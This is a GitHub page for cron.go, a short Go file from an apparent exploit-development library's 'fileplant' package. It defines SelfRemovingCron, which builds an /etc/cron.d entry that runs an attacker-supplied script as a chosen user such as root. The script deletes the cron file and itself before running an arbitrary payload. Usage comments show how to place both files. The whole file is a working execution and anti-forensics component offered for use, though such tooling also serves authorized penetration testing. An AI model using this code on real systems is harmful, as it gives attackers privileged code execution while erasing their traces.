-
Notifications
You must be signed in to change notification settings - Fork 36
/
Copy pathcron.go
32 lines (27 loc) · 1.25 KB
/
cron.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
// file planting based payloads.
//
// The fileplant package contains payloads to aid the exploit developer in achieving execution
// via binary planting, dll planting, and just general file hijinks.
package fileplant
import (
"fmt"
)
type CronPayload struct{}
var Cron = &CronPayload{}
// Creates two strings that can be used for gaining execution via "/etc/cron.d". The first return ("cron")
// should be uploaded to "cronPath" (presumably /etc/cron.d but I don't know your life), and the second
// return should be uploaded to "xploitPath" (e.g. /tmp/helloworld). The cron file will trigger
// execution of the bash script which will delete both the cron and itself. Example usage:
//
// cronPath := fmt.Sprintf("/etc/cron.d/%s", random.Letters(8))
// xploitPath := fmt.Sprintf("/tmp/%s", random.Letters(8))
// xploit, ok := generatePayload(conf)
// if !ok {
// return false
// }
// cron, xploit := payload.SelfRemovingCron("root", cronPath, xploitPath, xploit)
func (c *CronPayload) SelfRemovingCron(user string, cronPath string, xploitPath string, payload string) (string, string) {
cron := fmt.Sprintf("* * * * * %s /bin/sh %s\n", user, xploitPath)
xploit := fmt.Sprintf("#!/bin/sh\n\nrm -f %s\nrm -f %s\n%s\n", cronPath, xploitPath, payload)
return cron, xploit
}